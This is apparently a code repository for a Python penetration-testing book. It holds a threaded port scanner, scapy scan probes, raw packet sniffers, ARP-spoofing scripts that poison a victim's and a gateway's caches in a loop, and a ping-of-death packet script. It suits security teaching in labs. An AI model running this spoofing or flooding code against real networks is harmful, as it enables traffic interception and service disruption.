1445 | 27900 : Nintendo Wi-Fi Connection Unofficial
1446 | 27901 : Nintendo Wi-Fi Connection Unofficial
1447 | 27901 : id Software's Quake II master server Unofficial
1448 | 27950 : OpenArena outgoing Unofficial
1449 | 27960 : Activision's Enemy Territory and id Software's Quake III Arena, Quake III and Quake Live and some ioquake3 derived games, such as Urban Terror (OpenArena incoming) Unofficial
1450 | 28000 : Bitfighter Common/default Bitfighter Server Unofficial
1451 | 28001 : Starsiege: Tribes Common/default Tribes v.1 Server Unofficial
1452 | 28395 : www.SmartSystemsLLC.com Used by Smart Sale 5.0[citation needed] Unofficial
1453 | 28785 : Cube 2 Sauerbraten[162] Unofficial
1454 | 28786 : Cube 2 Sauerbraten Port 2[162] Unofficial
1455 | 28801 : Red Eclipse (Cube 2 derivative) default ports[163] Unofficial
1456 | 28852 : Killing Floor Unofficial
1457 | 28910 : Nintendo Wi-Fi Connection[164] Unofficial
1458 | 28960 : Call of Duty; Call of Duty: United Offensive; Call of Duty 2; Call of Duty 4: Modern Warfare; Call of Duty: World at War (PC Version) Unofficial
1459 | 29000 : Perfect World International Used by the Perfect World International Client Unofficial
1460 | 29070 : Game titled "Jedi Knight: Jedi Academy" by Ravensoft Unofficial
1461 | 29292 : TMO Integration Service Communications Port, Used by Transaction Manager SaaS (HighJump Software)[citation needed] Unofficial
1462 | 29900 : Nintendo Wi-Fi Connection[164] Unofficial
1463 | 29920 : Nintendo Wi-Fi Connection[164] Unofficial
1464 | 30000 : Pokémon Netbattle Unofficial
1465 | 30000 : MineTest Dedicated Server Unofficial
1466 | 30301 : BitTorrent Unofficial
1467 | 30564 : Multiplicity: keyboard/mouse/clipboard sharing software Unofficial
1468 | 30718 : Lantronix Discovery for Lantronix serial-to-ethernet devices Unofficial
1469 | 30777 : ZangZing agent Unofficial
1470 | 31314 : electric imp node<>server communication (TLS) Unofficial
1471 | 31337 : Back Orifice—remote administration tool (often Trojan horse) Unofficial
1472 | 31415 : ThoughtSignal—Server Communication Service (often Informational) Unofficial
1473 | 31438 : Rocket Software U2 uvcs—Server Communication Service Unofficial
1474 | 31456 : TetriNET IRC gateway on some servers Unofficial
1475 | 31457 : TetriNET Official
1476 | 31458 : TetriNET Used for game spectators Unofficial
1477 | 31620 : LM-MON (Standard Floating License Manager LM-MON) Official
1478 | 31820 : SyFlo SyFlo license manager Unofficial
1479 | 32000 : FlightGear multiplayer, experimental 2nd port (working code mod submitted to main fgms developer 2015-III-04 for evaluation)[76] Unofficial
1480 | 32123 : x3Lobby Used by x3Lobby, an internet application. Unofficial
1481 | 32137 : Immunet Protect ( : in version 2.0,[165] : since version 3.0[166]) Unofficial
1482 | 32245 : MMTSG-mutualed over MMT (encrypted transmission) Unofficial
1483 | 32400 : Used for Plex Media Server connections and media streams Unofficial
1484 | 32769 : FileNet RPC Unofficial
1485 | 32887 : Used by "Ace of Spades" game Unofficial
1486 | 32976 : LogMeIn Hamachi (VPN tunnel software; also port 12975)—used to connect to Mediation Server (bibi.hamachi.cc); will attempt to use SSL ( : port 443) if both 12975 & 32976 fail to connect Unofficial
1487 | 33330 : FMAudit Unofficial
1488 | 33333 : TNTchat default server port Unofficial
1489 | 33434 : traceroute Official
1490 | 33848 : Jenkins Remote access API and Auto-Discovery Unofficial
1491 | 33982 : Dezta software Unofficial
1492 | 34000 : MasterPort—WarZ Unofficial
1493 | 34001 : ClientPort—WarZ Unofficial
1494 | 34010 : PortStart—WarZ Unofficial
1495 | 34271 : Remuco remote control for media players[167] Unofficial
1496 | 34443 : Linksys PSUS4 print server[168] Unofficial
1497 | 34567 : EDI service[169] Official
1498 | 35357 : OpenStack ID Service Official
1499 | 36330 : Folding@home v7 default for client control interface Unofficial
1500 | 36700 : MapX communication port Official
1501 | 36963 : Unreal Software multiplayer games, such as Counter Strike 2D (2D clone of Counter Strike) Unofficial
1502 | 37601 : Epipole File Transfer Protocol [170] Official
1503 | 37659 : Axence nVision[citation needed] Unofficial
1504 | 37777 : Digital Video Recorder hardware[citation needed] Unofficial
1505 | 40000 : SafetyNET p Real-time Industrial Ethernet protocol Official
1506 | 40123 : Flatcast[171] Unofficial
1507 | 41794 : Crestron Control Port Official
1508 | 41795 : Crestron Control Port Official
1509 | 41823 : Murealm Client[citation needed] Unofficial
1510 | 43034 : LarmX.com™ database update mtr port[citation needed] Unofficial
1511 | 43047 : TheòsMessenger second port for service TheòsMessenger[citation needed] Unofficial
1512 | 43048 : TheòsMessenger third port for service TheòsMessenger[citation needed] Unofficial
1513 | 43594 : RuneScape, FunOrb, Runescape Private Servers game servers Unofficial
1514 | 43595 : RuneScape JAGGRAB servers Unofficial
1515 | 44405 : Mu Online Connect Server[citation needed] Unofficial
1516 | 44444 : LightClaw.TeamServer Asset synchronization[citation needed] Unofficial
1517 | 45824 : Server for the DAI family of client-server products[citation needed] Official
1518 | 47001 : WinRM—Windows Remote Management Service[172] Official
1519 | 47808 : BACnet Building Automation and Control Networks (4780810 = BAC016), commonly spills to 47809–47816 Official
1520 | 48653 : Robot Raconteur transport[173] Official
1521 | 49151 : Reserved[1]
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/port_description.dat:
--------------------------------------------------------------------------------
1 | (dp1
2 | .
--------------------------------------------------------------------------------
/Chapter02/Chapter2_scanning/Chapter2_scanning/programs_2nd_chapter/port_scanner15.py:
--------------------------------------------------------------------------------
1 | from threading import Thread
2 | import time
3 | import socket
4 | from datetime import datetime
5 | import cPickle
6 | '''Section1'''
7 | pickle_file = open("port_description.dat",'r')
8 | data=skill=cPickle.load(pickle_file)
9 |
10 | def scantcp(r1,r2,):
11 | try:
12 | for port in range(r1,r2):
13 | sock= socket.socket(socket.AF_INET,socket.SOCK_STREAM)
14 | socket.setdefaulttimeout(c)
15 | result = sock.connect_ex((rmip,port))
16 | if result==0:
17 | print "Port Open:-->\t", port,"--", data.get(port, "Not in Database")
18 | sock.close()
19 |
20 | except Exception as e:
21 | print e
22 |
23 | '''Section 2 '''
24 | print "*"*60
25 | print " \tWelcome, this is the Port scanner \n "
26 | d=raw_input("\tPress D for Domain Name or Press I for IP Address\t")
27 |
28 | if (d=='D' or d=='d'):
29 | rmserver = raw_input("\t Enter the Domain Name to scan:\t")
30 | rmip = socket.gethostbyname(rmserver)
31 | elif(d=='I' or d=='i'):
32 | rmip = raw_input("\t Enter the IP Address to scan: ")
33 |
34 | else:
35 | print "Wrong input"
36 |
37 | port_start1 = int(raw_input("\t Enter the start port number\t"))
38 | port_last1 = int(raw_input("\t Enter the last port number\t"))
39 | if port_last1>65535:
40 | print "Range not Ok"
41 | port_last1 = 65535
42 | print "Setting last port 65535"
43 | conect=raw_input("For low connectivity press L and High connectivity Press H\t")
44 |
45 | if (conect=='L' or conect=='l'):
46 | c =1.5
47 |
48 | elif(conect =='H' or conect=='h'):
49 | c=0.5
50 |
51 | else:
52 | print "\twrong Input"
53 |
54 | '''Section 3'''
55 | print "\n Mohit's port Scanner is working on ",rmip
56 | print "*"*60
57 | t1= datetime.now()
58 | total_ports=port_last1-port_start1
59 |
60 | ports_by_one_thread =30
61 | # tn number of port handled by one thread
62 | total_threads=total_ports/ports_by_one_thread # tnum number of threads
63 | if (total_ports%ports_by_one_thread!= 0):
64 | total_threads= total_threads+1
65 |
66 | if (total_threads > 300):
67 | ports_by_one_thread= total_ports/300
68 | if (total_ports%300 !=0):
69 | ports_by_one_thread= ports_by_one_thread+1
70 |
71 | total_threads = total_ports/ports_by_one_thread
72 | if (total_ports%total_threads != 0):
73 | total_threads= total_threads+1
74 |
75 | threads= []
76 | start1 = port_start1
77 | try:
78 | for i in range(total_threads):
79 |
80 | last1=start1+ports_by_one_thread
81 | # thread=str(i)
82 | if last1>=port_last1:
83 | last1 = port_last1
84 | port_thread = Thread(target=scantcp,args=(start1,last1,) )
85 | port_thread.start()
86 | threads.append(port_thread)
87 | start1=last1
88 |
89 | except Exception as e :
90 | print e
91 | '''Section 4'''
92 | for t in threads:
93 | t.join()
94 | print "Exiting Main Thread"
95 | t2= datetime.now()
96 |
97 | total =t2-t1
98 | print "scanning complete in " , total
99 |
100 |
101 |
102 |
--------------------------------------------------------------------------------
/Chapter03/.idea/Chapter 3.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Chapter03/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
--------------------------------------------------------------------------------
/Chapter03/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Chapter03/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Chapter03/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 |
269 |
270 |
271 |
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
387 |
388 |
389 |
390 |
391 |
392 |
393 |
394 |
395 |
396 |
397 |
398 |
399 |
400 |
401 |
402 |
403 |
404 |
405 |
406 |
407 |
408 |
409 |
410 |
411 |
412 |
413 |
414 |
415 |
416 |
417 |
418 |
419 |
420 |
421 |
422 |
423 |
424 |
425 |
426 |
427 |
428 |
429 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Python-Penetration-Testing-Essentials-Second-Edition/f2a666b62826b4adc334a8e69ccbfe20b5cf12c2/Chapter03/Chapter3_sniifing.zip
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/.idea/Chapter3_sniifing.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 |
191 |
192 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
200 |
201 |
202 |
203 |
204 |
205 |
206 |
207 |
208 |
209 |
210 |
211 |
212 |
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 |
230 |
231 |
232 |
233 |
234 |
235 |
236 |
237 |
238 |
239 |
240 |
241 |
242 |
243 |
244 |
245 |
246 |
247 |
248 |
249 |
250 |
251 |
252 |
253 |
254 |
255 |
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 |
264 |
265 |
266 |
267 |
268 | 1521693668449
269 |
270 |
271 | 1521693668449
272 |
273 |
274 |
275 |
276 |
277 |
278 |
279 |
280 |
281 |
282 |
283 |
284 |
285 |
286 |
287 |
288 |
289 |
290 |
291 |
292 |
293 |
294 |
295 |
296 |
297 |
298 |
299 |
300 |
301 |
302 |
303 |
304 |
305 |
306 |
307 |
308 |
309 |
310 |
311 |
312 |
313 |
314 |
315 |
316 |
317 |
318 |
319 |
320 |
321 |
322 |
323 |
324 |
325 |
326 |
327 |
328 |
329 |
330 |
331 |
332 |
333 |
334 |
335 |
336 |
337 |
338 |
339 |
340 |
341 |
342 |
343 |
344 |
345 |
346 |
347 |
348 |
349 |
350 |
351 |
352 |
353 |
354 |
355 |
356 |
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
365 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 |
379 |
380 |
381 |
382 |
383 |
384 |
385 |
386 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/ack.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11")
3 | sy1 = TCP(sport =1024, dport=137, flags="A", seq=12345)
4 | packet = ip1/sy1
5 | p =sr1(packet)
6 | p.show()
7 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpsp.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
5 | s.bind(("eth0",socket.htons(0x0800)))
6 |
7 | sor = '\x00\x0c\x29\x4f\x8e\x35'
8 |
9 | victmac ='\x00\x0C\x29\x2E\x84\x7A'
10 |
11 | gatemac = '\x00\x50\x56\xC0\x00\x08'
12 | code ='\x08\x06'
13 | eth1 = victmac+sor+code #for victim
14 | eth2 = gatemac+sor+code # for gateway
15 |
16 | htype = '\x00\x01'
17 | protype = '\x08\x00'
18 | hsize = '\x06'
19 | psize = '\x04'
20 | opcode = '\x00\x02'
21 |
22 | gate_ip = '192.168.0.1'
23 | victim_ip = '192.168.0.11'
24 | gip = socket.inet_aton ( gate_ip ) # to convert the ip into hexadecimal formate
25 | vip = socket.inet_aton ( victim_ip ) # to convert the ip into hexadecimal formate
26 |
27 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
28 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
29 |
30 |
31 | while 1:
32 | s.send(arp_victim)
33 | s.send(arp_gateway)
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/arpspex.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
5 | s.bind(("eth0",socket.htons(0x0800)))
6 |
7 | sor = '\x00\x0c\x29\x4f\x8e\x35'
8 |
9 | victmac ='\x88\x53\x2e\x0a\x75\x3f'
10 |
11 | gatemac = '\x84\x1b\x5e\x50\xc8\x6e'
12 | code ='\x08\x06'
13 | eth1 = victmac+sor+code #for victim
14 | eth2 = gatemac+sor+code # for gateway
15 |
16 | htype = '\x00\x01'
17 | protype = '\x08\x00'
18 | hsize = '\x06'
19 | psize = '\x04'
20 | opcode = '\x00\x02'
21 |
22 | gate_ip = '10.0.0.1'
23 | victim_ip = '10.0.0.6'
24 | gip = socket.inet_aton ( gate_ip )
25 | vip = socket.inet_aton ( victim_ip )
26 |
27 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
28 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
29 |
30 |
31 | while 1:
32 | s.send(arp_victim)
33 | s.send(arp_gateway)
34 |
35 |
36 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/client side/unstruc.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
4 | host = "192.168.5.6"
5 | port = 5610
6 | s.connect((host,port))
7 | msg= s.recv(1024)
8 | print msg
9 | print struct.unpack('hhl',msg)
10 | s.close()
11 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/eth.py:
--------------------------------------------------------------------------------
1 | import socket
2 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))
3 | s.bind(("eth0",socket.ntohs(0x0800)))
4 |
5 | sor = '\x00\x0c\x29\x4f\x8e\x35'
6 |
7 | des ='\x00\x0C\x29\x2E\x84\x7A'
8 | code ='\x08\x00'
9 | eth = des+sor+code
10 | s.send(eth)
11 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/fin.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11")
3 | sy1 = TCP(sport =1024, dport=80, flags="F", seq=12345)
4 | packet = ip1/sy1
5 | p =sr1(packet)
6 | p.show()
7 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/halfopen.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.10", dst ="192.168.0.11" )
3 | tcp1 = TCP(sport =1024, dport=80, flags="S", seq=12345)
4 | packet = ip1/tcp1
5 | p =sr1(packet, inter=1)
6 | p.show()
7 |
8 | rs1 = TCP(sport =1024, dport=80, flags="R", seq=12347)
9 | packet1=ip1/rs1
10 | p1 = sr1(packet1)
11 | p1.show
12 |
13 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/netdiss.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import binascii
3 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0003))
4 | s.bind(("eth0",socket.htons(0x0800)))
5 |
6 | def mach(mac):
7 | a = '\\x'
8 | mac1= mac.replace(':',a)
9 | mac2= a+mac1
10 | return mac2
11 |
12 | sor = '\x48\x41\x43\x4b\x45\x52'
13 |
14 |
15 | vic1 = raw_input("Enter the Victim MAC ")
16 | victmac = mach(vic1)
17 | print victmac
18 |
19 | gate1 = raw_input("Enter the gateway MAC ")
20 | gatemac = mach(gate1)
21 | print gatemac
22 | code ='\x08\x06'
23 | eth1 = victmac+sor+code #for victim
24 | eth2 = gatemac+sor+code # for gateway
25 |
26 | htype = '\x00\x01'
27 | protype = '\x08\x00'
28 | hsize = '\x06'
29 | psize = '\x04'
30 | opcode = '\x00\x02'
31 |
32 |
33 | gate_ip = '192.168.0.1'
34 | victim_ip = '192.168.0.11'
35 | gip = socket.inet_aton ( gate_ip )
36 |
37 | vip = socket.inet_aton ( victim_ip )
38 |
39 |
40 | arp_victim = eth1+htype+protype+hsize+psize+opcode+sor+gip+victmac+vip
41 | arp_gateway= eth2+htype+protype+hsize+psize+opcode+sor+vip+gatemac+gip
42 |
43 |
44 | while 1:
45 | s.send(arp_victim)
46 | s.send(arp_gateway)
47 |
48 |
49 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/pingofd.py:
--------------------------------------------------------------------------------
1 | from scapy.all import *
2 | ip1 = IP(src="192.168.0.99", dst ="192.168.0.11")
3 |
4 | packet = ip1/ICMP()/("m"*60000)
5 | send(packet)
6 | i=0
7 | while i<20 :
8 | send(packet)
9 | i = i+1
10 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/sniffer1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
5 | while True:
6 |
7 | pkt = s.recvfrom(2048)
8 | ethhead = pkt[0][0:14]
9 | print pkt[0]
10 | eth = struct.unpack("!6s6s2s",ethhead)
11 | print "--------Ethernet Frame--------"
12 | print "desination mac",binascii.hexlify(eth[0])
13 | print "Source mac",binascii.hexlify(eth[1])
14 | binascii.hexlify(eth[2])
15 |
16 | ipheader = pkt[0][14:34]
17 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
18 | print "-----------IP------------------"
19 | print "TTL :", ip_hdr[1]
20 | print "Source IP", socket.inet_ntoa(ip_hdr[3])
21 | print "Destination IP", socket.inet_ntoa(ip_hdr[4])
22 | print "---------TCP----------"
23 | tcpheader = pkt[0][34:54]
24 | #tcp_hdr = struct.unpack("!HH16s",tcpheader)
25 | tcp_hdr = struct.unpack("!HH9ss6s",tcpheader)
26 | print "Source Port ", tcp_hdr[0]
27 | print "Destination port ", tcp_hdr[1]
28 | print "Flag ",binascii.hexlify(tcp_hdr[3])
29 |
30 |
31 |
32 |
33 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/sniffer_new.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
5 | while True:
6 | try:
7 | pkt = s.recvfrom(2048)
8 | ethhead = pkt[0][0:14]
9 | eth = struct.unpack("!6s6s2s",ethhead)
10 | print "*"*50
11 | print "--------Ethernet Frame--------"
12 | print "Source MAC --> Destination MAC"
13 | print binascii.hexlify(eth[1]),"-->",binascii.hexlify(eth[0])
14 | print "-----------IP------------------"
15 | num=pkt[0][14].encode('hex')
16 | ip_length = (int(num)%10)*4
17 | ip_last_range = 14+ip_length
18 | ipheader = pkt[0][14:ip_last_range]
19 | ip_hdr = struct.unpack("!12s4s4s",ipheader)
20 | print "Source IP--> Destination IP"
21 | print socket.inet_ntoa(ip_hdr[1]),"-->", socket.inet_ntoa(ip_hdr[2])
22 | print "---------TCP----------"
23 | tcpheader = pkt[0][ip_last_range:ip_last_range+20]
24 |
25 | tcp_hdr = struct.unpack("!HH9sB6s",tcpheader)
26 | print "Source Port--> Destination Port"
27 | print tcp_hdr[0],"-->", tcp_hdr[1]
28 | flag1 =tcp_hdr[3]
29 | print flag1
30 | str1 = bin(flag1)[2:].zfill(8)
31 | flag1 = ''
32 | if str1[0]== '1':
33 | flag1 = flag1+"CWR "
34 | if str1[1] == '1':
35 | flag1 = flag1+ "ECN Echo "
36 | if str1[2] == '1':
37 | flag1 = flag1 + "Urgent "
38 | if str1[3]== '1':
39 | flag1 = flag1+ "Ack "
40 |
41 | if str1[4]== '1':
42 | flag1 = flag1+"Push "
43 | if str1[5] == '1':
44 | flag1 = flag1+ "Reset "
45 | if str1[6] == '1':
46 | flag1 = flag1 + "Sync "
47 | if str1[7]== '1':
48 | flag1 = flag1+ "Fin "
49 |
50 | print "Flag", flag1
51 | except Exception as e :
52 | print e
53 |
54 |
55 |
56 |
57 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/sniffer_ttl.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | import binascii
4 | s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
5 | while True:
6 | try:
7 | pkt = s.recvfrom(2048)
8 | ethhead = pkt[0][0:14]
9 | eth = struct.unpack("!6s6s2s",ethhead)
10 | print "*"*50
11 | print "--------Ethernet Frame--------"
12 | print "Source MAC --> Destination MAC"
13 | print binascii.hexlify(eth[1]),"-->",binascii.hexlify(eth[0])
14 | print "-----------IP------------------"
15 | num=pkt[0][14].encode('hex')
16 | ip_length = (int(num)%10)*4
17 | ip_last_range = 14+ip_length
18 | ipheader = pkt[0][14:ip_last_range]
19 | ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
20 | print "Source IP--> Destination IP, "
21 | print socket.inet_ntoa(ip_hdr[3]),"-->", socket.inet_ntoa(ip_hdr[4])
22 | print "TTL: ",ip_hdr[1]
23 | print "---------TCP----------"
24 | tcpheader = pkt[0][ip_last_range:ip_last_range+20]
25 |
26 | tcp_hdr = struct.unpack("!HH9sB6s",tcpheader)
27 | print "Source Port--> Destination Port"
28 | print tcp_hdr[0],"-->", tcp_hdr[1]
29 | flag1 =tcp_hdr[3]
30 | print flag1
31 | str1 = bin(flag1)[2:].zfill(8)
32 | flag1 = ''
33 | if str1[0]== '1':
34 | flag1 = flag1+"CWR "
35 | if str1[1] == '1':
36 | flag1 = flag1+ "ECN Echo "
37 | if str1[2] == '1':
38 | flag1 = flag1 + "Urgent "
39 | if str1[3]== '1':
40 | flag1 = flag1+ "Ack "
41 |
42 | if str1[4]== '1':
43 | flag1 = flag1+"Push "
44 | if str1[5] == '1':
45 | flag1 = flag1+ "Reset "
46 | if str1[6] == '1':
47 | flag1 = flag1 + "Sync "
48 | if str1[7]== '1':
49 | flag1 = flag1+ "Fin "
50 |
51 | print "Flag", flag1
52 | except Exception as e :
53 | print e
54 |
55 |
56 |
57 |
58 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/str1.py:
--------------------------------------------------------------------------------
1 | import struct
2 | ms= struct.pack('hhl', 1, 2, 3)
3 | print (ms)
4 | k= struct.unpack('hhl',ms)
5 | print k
6 |
--------------------------------------------------------------------------------
/Chapter03/Chapter3_sniifing/Chapter3_sniifing/Chapter_3_programs/struct1.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import struct
3 | host = "192.168.5.6"
4 | port = 5610
5 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
6 | s.bind((host, port))
7 | s.listen(1)
8 | conn, addr = s.accept()
9 | print "connected by", addr
10 | msz= struct.pack('hhl', 1, 2, 3)
11 | conn.send(msz)
12 | conn.close()
13 |
--------------------------------------------------------------------------------
/Chapter04/Chapter4_network_attack_preventation.zip:
--------------------------------------------------------------------------------
